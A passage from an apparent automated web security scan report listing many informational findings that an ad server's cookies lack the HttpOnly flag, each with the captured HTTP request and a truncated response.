GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.305. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11370845975@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11370845975@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.306. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.307. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.309. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11624211567@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11624211567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.310. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.311. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2453
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.312. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11824141209@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11824141209@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.314. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11911576582@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11911576582@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660; session=1296256112|1296268201

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.315. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.316. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.317. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
